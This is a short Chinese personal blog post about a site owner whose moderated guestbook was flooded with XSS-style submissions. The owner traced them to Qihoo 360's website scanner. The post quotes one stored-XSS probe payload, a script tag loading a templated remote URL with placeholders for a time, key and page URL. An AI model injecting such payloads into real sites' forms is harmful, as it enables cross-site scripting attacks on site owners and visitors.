今晚用360检测一下网站,然后去看电视。不一会手机微信在不停震动,我以为是谁发信息来了,或者是群里热闹了。
等我看一会电视回来看手机的时候发现是邮箱提醒,里面50+的信息,都来自我的留言板。
打开邮箱后发现:
还好我是做了审核功能的,不然全部显示出来了,都是什么东西啊,看起来像是网站攻击,xss攻击一样。
大量类似这样的代码:而且,IP还是固定的。
88888<script id="eye_xss" type="text/javascript" src="${dom_xss_url}?time=[NOWTIME]_0_key=[AUTHKEY]_0_mid=[AUTHMID]_0_cururl=[BASE64URL]"></script>
我想拉黑该IP(182.118.33.6)的,不过我还是先查一下是哪里的,结果发现是360奇虎公司的。
虽然百度来的说是是攻击,我切换到360站长管理,发现正在扫描:
那么应该就是这货的问题了,等待一会发现真的没有什么提醒了,也不来邮箱了。
好了,应该就是这个问题了。我做个过滤的,所以没有什么问题。
想想这样搞真的不好,检测就检呗,搞那么多数据,成为垃圾数据了,浪费资源呢。还真是在攻击我呢!
总结:
网络安全真重要!